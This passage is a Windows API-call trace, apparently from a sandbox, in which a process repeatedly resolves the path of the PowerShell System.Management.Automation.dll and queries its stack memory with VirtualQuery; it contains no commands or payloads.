lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.899] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.900] GetLastError () returned 0x0 [0052.901] VirtualQuery (in: lpAddress=0x14d324, lpBuffer=0x14e324, dwLength=0x1c | out: lpBuffer=0x14e324*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.901] VirtualQuery (in: lpAddress=0x14d360, lpBuffer=0x14e360, dwLength=0x1c | out: lpBuffer=0x14e360*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.902] GetLastError () returned 0x0 [0052.903] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.903] GetLastError () returned 0x0 [0052.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.903] GetLastError () returned 0x0 [0052.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.903] GetLastError () returned 0x0 [0052.903] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.903] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.904] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.905] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.905] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.905] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.905] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.906] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.906] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.906] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.906] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.907] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.907] VirtualQuery (in: lpAddress=0x14d4cc, lpBuffer=0x14e4cc, dwLength=0x1c | out: lpBuffer=0x14e4cc*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.908] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.909] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.909] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.909] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.909] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x347483b3, Data2=0xafac, Data3=0x4b55, Data4=([0]=0xb3, [1]=0x79, [2]=0xf3, [3]=0x9d, [4]=0xcc, [5]=0xb9, [6]=0x98, [7]=0xe7))) returned 0x0 [0052.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.909] GetLastError () returned 0x0 [0052.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.909] GetLastError () returned 0x0 [0052.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.909] GetLastError () returned 0x0 [0052.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.909] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, 